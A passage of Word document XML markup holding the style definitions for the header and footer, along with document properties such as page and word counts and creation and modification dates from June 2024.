    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00782F3D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00782F3D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00782F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3</Pages>
  <Words>314</Words>
  <Characters>1795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2024-06-20T04:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-23T13:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>